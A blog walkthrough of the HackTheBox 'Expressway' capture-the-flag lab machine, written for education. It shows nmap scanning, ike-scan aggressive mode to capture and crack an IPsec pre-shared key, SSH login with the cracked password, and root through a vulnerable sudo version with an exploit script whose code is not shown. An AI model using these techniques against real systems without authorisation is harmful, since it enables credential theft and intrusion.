Logo Havoc Hacking Articles

HackTheBox Expressway

⚡ Walkthrough⚡

Sep 21, 2025 - 4 minute read
feature image challenges

HackTheBox Expressway Walkthrough

This was an easy linux machine and the first machine for Season 9. an this is how i pwned it. lets go….

Initial Enumeration

Save <you_machine_ip> : expressway.htb in your /etc/hosts for easy accessibility and clean walkthrough.

Tip for beginners: editing /etc/hosts gives you a human-readable hostname instead of typing IPs every time. On Linux edit with sudo nano /etc/hosts (or your editor), add a line like:

10.10.10.10 expressway.htb

Save and then you can ping expressway.htb or ssh ike@expressway.htb instead of using the IP.

First as usual we run nmap and this time the interesting thing in nmap was in tcp only 22 port was open that was for ssh , but looking my nmap scan further I see a udp port 500 ISAKMP Framework running

Quick nmap reminder for beginners: a useful lightweight nmap command for initial checks is:

 sudo nmap -sC -sV -p- --min-rate 1000 <target>

Nmap TCP Scan Results

But note: UDP scanning is slower and often requires explicit flags like -sU. In this box the important result was UDP/500 open which is ISAKMP (used by IPsec/IKE — VPN/key-exchange stuff).

Nmap UDP Scan Results

Foothold and user.txt

So ISAKMP is a VPN/key-exchange service that is running on port 500.
To further enumerate this service we will use a tool called ike-scan.

What is ike-scan?
ike-scan is a tool that probes IKE (Internet Key Exchange) services and can reveal protocol details, identities, and — when the server is in aggressive mode — values that can be used to derive a PSK hash you can attempt to crack. Aggressive mode is noisier but gives more information (like usernames or IDs).

  • So running the scan in aggressive mode we get some very important information.
  • The first thing is auth which is PSK (Pre-Shared Key) and the second this is our username which is our way to foothold — that identity is ike@expressway.htb.
  • To get the PSK (pre-shared key) parameters from the server we will use the below command :-
sudo ike-scan -A -P <YOUR_MACHINE_IP>

IKE Scan Aggressive Mode

  • Further save this PSK string to a file called psk.txt. The -P flag instructs ike-scan to print parameters useful for PSK cracking.

  • The long colon-separated string contains many fields; the final field is typically the hash for the PSK verification — that is what we need to crack offline with a wordlist.

  • Cracking it returns us with the password ==freakingrockstarontheroad==

  • This password is for ssh of user ike@expressway.htb

Password Cracking Results

How to use it (simple SSH example for beginners):

ssh ike@expressway.htb
Password: freakingrockstarontheroad

If SSH key authentication is required, you may need to use password authentication or check the box on the HTB machine that ssh allows passwords. If you get Permission denied, double-check username, hosts entry, and that the service is still up.

SSH Login Success

  • This was our way for user.txt and the foothold

User Flag

Privilege Escalation and root.txt

  • The privilege escalation for this machine was very simple and we just need to exploit a vulnerable sudo version.
  • Check sudo version with the follow command:-

How to check sudo version (beginners):
Run:

sudo -V

That prints detailed sudo info — look at the first lines for Sudo version 1.9.17 (example). You can also run:

sudo --version

If you are able to run sudo -l as the user, that can also show which commands (if any) the user can run as root without password.

Sudo Version Check

Safety & ethics note for beginners: downloading and running exploit code can be dangerous on your host machine. Only run exploits in an isolated environment (e.g., a VM lab) and inspect scripts before running them. On HTB boxes, using published exploits for learning is normal — still inspect and understand each step.

  • To exploit make a file in /tmp directory with the contents of priv_[esc.sh] from the github repo and give suitable executable permissions

Steps (example, keep the exploit file you downloaded checked):

# from the box (as the low-priv user)
cd /tmp
# create file and paste the exploit content you reviewed
nano priv_esc.sh
# make it executable
chmod +x priv_esc.sh

How to run it: follow the repository instructions. Typically the exploit requires invoking sudo in a specific way or triggering the vulnerable code path. For example (pseudo):

sudo /path/to/vulnerable/command /tmp/priv_esc.sh

But do not run an exploit blindly — read the README in the repo and confirm the usage. On this machine the repo contained tested instructions which, when followed, resulted in root.

Privilege Escalation Success

  • Finally we became root and got root.txt

Thanks for reading the walkthrough. Hope you like it ! happy hacking